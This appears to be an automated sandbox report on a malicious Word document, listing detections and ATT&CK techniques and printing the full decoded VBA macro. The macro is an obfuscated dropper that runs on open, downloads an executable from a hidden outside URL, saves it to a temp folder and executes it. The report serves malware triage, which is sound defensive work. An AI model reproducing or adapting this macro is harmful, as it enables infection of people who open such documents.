MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that executes upon opening the document. This macro utilizes `CreateObject("WScript.Shell")` and `Shell()` calls, indicating an intent to run external commands or scripts. The presence of `WScript.Shell` usage and `Document_Open` macro firings strongly suggests a downloader or dropper functionality, likely fetching and executing a secondary payload. The ClamAV detection of 'Doc.Dropper.Donoff-5743530-0' further supports this dropper classification.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim GYPPhgwSJI As Boolean, FxaIym As String Set QIeYwGQcDT = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim GYPPhgwSJI As Boolean, FxaIym As String Set QIeYwGQcDT = CreateObject("WScript.Shell") End Function -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String) CallByName yfRxWaL, vwIihNHwRg, 1 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() Dim rayiAM As Boolean -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8685 bytes |
SHA-256: 1c23a46288108a13cf6f10958bcb1ee11ef9e25ccabdd5c7f7880e2e128d3026 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
142 of 219 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WYdZurj(ByVal nUPyPDdceo As String, ByVal TPRpbPmQCS As String)
wHTiRT
If mjspzU(9002, 675, "ZslO") Then
jGxNa True, "qVEIN", "dYuq"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub pqGeLr(ByVal DfeiPY As Integer)
YoQROe 280, "rEm", 3880
nSBNYIEqi
szgGkotf 3197, "s7cGX", True
End Sub
Private Sub Document_Open()
Dim rayiAM As Boolean
ziCyGtLhET.tEuAnmnNoX
End Sub
Private Sub lWyprRWv()
mqxGfUKgzi 6499, "JiAz", "h0jWb"
MmaltzrlX 1715
If hBTkqIt("") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function JZUPIUj() As String
yhlAeROGu
JZUPIUj = "IX6wT"
End Function
Attribute VB_Name = "HBSZwovgJ"
Private Sub kNtGZ(ByVal wKkcxXjA As Boolean, ByVal qGtxzruvA As Integer)
JdrgwQ
End Sub
Public Function QIeYwGQcDT() As Object
Dim GYPPhgwSJI As Boolean, FxaIym As String
Set QIeYwGQcDT = CreateObject("WScript.Shell")
End Function
Public Function xOEKtLwVn() As Object
Set xOEKtLwVn = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub gJYxp()
If euVWF Then
EqgCajclK 1379, False, "3b3t4"
End If
End Sub
Private Sub TYdqFrJ(ByVal vPiqaehkDU As String)
rwKYqDFg True, 2503
End Sub
Public Function MMFNY() As Object
Dim TAtuyTiY As Boolean
Set MMFNY = CreateObject("ADODB.Stream")
End Function
Private Function jqnkUUK() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "tfzt", "MT", 3231
jqnkUUK = 5750
End Function
Attribute VB_Name = "knodiW"
Public Function xDoszvxfJ(ByVal oQueYF As Integer, ByVal nyOGqE As Integer, ByVal wgQCT As String, ByVal phBpFKg As String) As String
Dim STjqUuQx As Integer, PsDspeSF As Integer
xDoszvxfJ = Mid(phBpFKg, oQueYF, 1)
End Function
Private Sub BNaEHg(ByVal zGXTd As Integer, ByVal TqsaoB As String)
BkMTwPAnUV "2aaR", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "lqc", "RiKq"
End If
nnWkkdeYWI "fH3q", "9kA", False
tvremm "2Za", "eej89", True
End Sub
Public Function NRSYHMIx(ByVal QkQiSpG As Integer, ByVal xFAMLNG As Boolean, ByVal QYvmLrB As String, ByVal cEOct As String) As String
NRSYHMIx = cEOct & QYvmLrB
End Function
Public Function fUwaMiNol(ByVal ySfnfgt As String, ByVal bazlEjPf As String) As Boolean
Dim naWyzQDkE As Integer
fUwaMiNol = InStr(1, bazlEjPf, ySfnfgt)
End Function
Attribute VB_Name = "tirUirwi"
Private Function sRGXI(ByVal UiDLFqDMy As Boolean, ByVal lvuJZD As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
sRGXI = False
End Function
Public Function OThwuG(ByVal rkxaUcqY As String, ByVal nMlOzdDx As String) As String
Dim OjWyjKn As Boolean
Dim BdLPTw As String
crcNfikH = "hAox"
For RTVIyfIss = 1 To Len(rkxaUcqY)
OjWyjKn = knodiW.fUwaMiNol(knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), nMlOzdDx)
If Not OjWyjKn Then
OThwuG = knodiW.NRSYHMIx(2102, True, knodiW.xDoszvxfJ(RTVIyfIss, 5243, pVgDS, rkxaUcqY), OThwuG)
fitPL = ""
End If
Next
End Function
Private Function rfPVXXPon() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
rfPVXXPon = 5758
End Function
Private Function pVgDS() As String
pVgDS = "Q5m"
End Function
Attribute VB_Name = "ziCyGtLhET"
Private Function oRyMOuK(ByVal BaLAefKDY As String, ByVal vHzzGv As String) As String
Dim VcSZuhfau As Integer
Set aGTjzuX = zivWxP.dcKBLbGs(SAcpVcW, HBSZwovgJ.QIeYwGQcDT, tirUirwi.OThwuG("P3RAWOVCVES3VS", ".A3VW"))
oRyMOuK = aGTjzuX(BaLAefKDY)
End Function
Private Function yxnGhEe() As String
yxnGhEe = tirUirwi.OThwuG("OYp4eCnC", "CY4 ")
End Function
Private Function SAcpVcW() As String
SAcpVcW = tirUirwi.OThwuG("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function xgiYagx() As String
xgiYagx = "1FaH"
End Function
Private Sub hfZqCeGBC(ByVal qaFAJ As String, ByVal QhYhbt As String)
Set zYVIGSsck = HBSZwovgJ.xOEKtLwVn
zivWxP.mAcTRLD ejEmLhof, tirUirwi.OThwuG("OYp4eCnC", "CY4 "), qaFAJ, zYVIGSsck, False
zivWxP.AgrPU tirUirwi.OThwuG("UJsJJerj-JJAjgJeJnGt", "GJj"), vaDCWQGexY, 2963, tirUirwi.OThwuG("MQCoJzXilgClYaX/C4C.g0 C(CXcoXmYYpYatYiQbgYlYe;C)g", "YJXQCg"), LEhcc, zYVIGSsck
zivWxP.JBGqPB 1177, zYVIGSsck, HCFxEEPND
ZWBbn True, 6317, QhYhbt, zivWxP.LRpuX(LEhcc, LgDWFy, zYVIGSsck)
End Sub
Private Function LgDWFy() As String
LgDWFy = tirUirwi.OThwuG(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub EiLevE()
Dim cIPEyduG As Integer
OIRUtHf = True
On Error GoTo xeSTzm
zIxdob = False
hfZqCeGBC wnEiH, gRFLC
SeYuJBojru gRFLC
Exit Sub
xeSTzm:
End Sub
Private Function gRFLC() As String
Dim YNmOHLMBF As Integer, hIKrUpMu As Integer
gRFLC = oRyMOuK(tirUirwi.OThwuG("ZTEUMZsP", "9cZUsX"), "nf") & oycrPfMb
End Function
Private Function TGGrY() As String
TGGrY = tirUirwi.OThwuG("nTyHpaeB", "HBaqXn")
End Function
Private Function oycrPfMb() As String
Dim YvsChVwYth As Integer
Dim AkGou As Integer
JJNlxuFaS = True
oycrPfMb = tsIVRe
End Function
Private Sub SeYuJBojru(ByVal ONtWMv As String)
zivWxP.YVjBqrLyxJ "if", HBSZwovgJ.QIeYwGQcDT, 7188, ONtWMv, tirUirwi.OThwuG("kEx2eI1c", "k31IG2")
End Sub
Private Function LEhcc() As String
LEhcc = "D9k"
End Function
Public Sub tEuAnmnNoX()
Dim JhZBmFQNK As Integer
Dim qKwvGumloC As Boolean
kZsag = 4121
EiLevE
End Sub
Private Function FzmIedRZZ() As String
FzmIedRZZ = tirUirwi.OThwuG("YClm/o/s0e", "0dY/m")
End Function
Private Function wnEiH() As String
Dim JSZINyhSId As Integer
wnEiH = tirUirwi.OThwuG("ThtDt pTB:S/T/fTSprBDe z. cT o m/BsDyD stD emB/DBcSa cThe /SBw orDdS.SeTBx e", "SDB T")
End Function
Private Sub ZWBbn(ByVal jdVfKLEFHy As Boolean, ByVal IsBrj As Integer, ByVal Gmumxvrhz As String, ByVal SOOqWKdo As Variant)
Dim oNKsSMFTa As Boolean
Dim MhlcMtb As Integer
Set urROlotAH = HBSZwovgJ.MMFNY
zivWxP.HPdra True, 1, urROlotAH, TGGrY
zivWxP.JBGqPB 1177, urROlotAH, yxnGhEe
uRUxACPwrk = 5904
zivWxP.YVjBqrLyxJ xgiYagx, urROlotAH, 7188, SOOqWKdo, tirUirwi.OThwuG("Wbbribtzek", "Zzlmkb")
sIbLjqP = "Gn"
zivWxP.AgrPU Gmumxvrhz, pqTTm, 2963, 2, xgiYagx, urROlotAH
zivWxP.JBGqPB 1177, urROlotAH, FzmIedRZZ
End Sub
Private Function ejEmLhof() As String
XBoKEL = False
ejEmLhof = tirUirwi.OThwuG("G.E TB", ".BA ")
End Function
Private Function pqTTm() As String
pqTTm = tirUirwi.OThwuG("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function tsIVRe() As String
tsIVRe = tirUirwi.OThwuG("O/7vOeiav6O62vJ32vvamf.OJexiOe", "OivJm")
End Function
Private Function vaDCWQGexY() As String
vaDCWQGexY = tirUirwi.OThwuG("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function HCFxEEPND() As String
HCFxEEPND = tirUirwi.OThwuG("SIerIndr", "MIrG")
End Function
Attribute VB_Name = "zivWxP"
Private Sub avcEIXr(ByVal DWTDS As Boolean, ByVal gDjVCb As Integer)
QzYClH "Ukt", 8941, "Ox"
End Sub
Public Sub JBGqPB(ByVal JRstc As Integer, ByVal yfRxWaL As Object, ByVal vwIihNHwRg As String)
CallByName yfRxWaL, vwIihNHwRg, 1
End Sub
Public Sub mAcTRLD(ByVal hyqvEXT As Variant, ByVal CyPNNcqPO As String, ByVal YGjItzV As Variant, ByVal foEFRfqWkY As Object, ByVal jtkSk As Variant)
IXNhTW = ""
CallByName foEFRfqWkY, CyPNNcqPO, 1, hyqvEXT, YGjItzV, jtkSk
End Sub
Public Function dcKBLbGs(ByVal ePoyCQ As String, ByVal VLtxeUpieQ As Object, ByVal MjhGLIcf As String) As Variant
Dim MXLUhG As Integer, bAmMXC As Integer
Set dcKBLbGs = CallByName(VLtxeUpieQ, ePoyCQ, 2, MjhGLIcf)
End Function
Public Sub AgrPU(ByVal IamjGclJY As Variant, ByVal mcmyHmAzvJ As String, ByVal McFGHaA As Integer, ByVal CmMeWqlkaz As Variant, ByVal qFoYKWTNs As String, ByVal fppFJG As Object)
CallByName fppFJG, mcmyHmAzvJ, 1, IamjGclJY, CmMeWqlkaz
End Sub
Public Sub HPdra(ByVal scsvvzFw As Boolean, ByVal EuVYIFH As Variant, ByVal TlFLzFt As Object, ByVal vzncfc As String)
CallByName TlFLzFt, vzncfc, 4, EuVYIFH
End Sub
Private Sub sfZFfFZ(ByVal nkXhelbfd As Integer, ByVal wFlNFy As Integer)
VYZRTX ""
FaPULoVT 5592, "040", ""
End Sub
Public Sub YVjBqrLyxJ(ByVal FRfgBCc As String, ByVal BoSBIxdpy As Object, ByVal vNgbfey As Integer, ByVal rvSbIsAIn As Variant, ByVal kuIPQRiG As String)
CallByName BoSBIxdpy, kuIPQRiG, 1, rvSbIsAIn
End Sub
Public Function LRpuX(ByVal wyKQFiqrlm As String, ByVal lDGcCyNh As String, ByVal iJhLFwZOdT As Object) As Variant
Dim RSTyzqKRy As Integer, UNYDxtaaT As Boolean
LRpuX = CallByName(iJhLFwZOdT, lDGcCyNh, 2)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.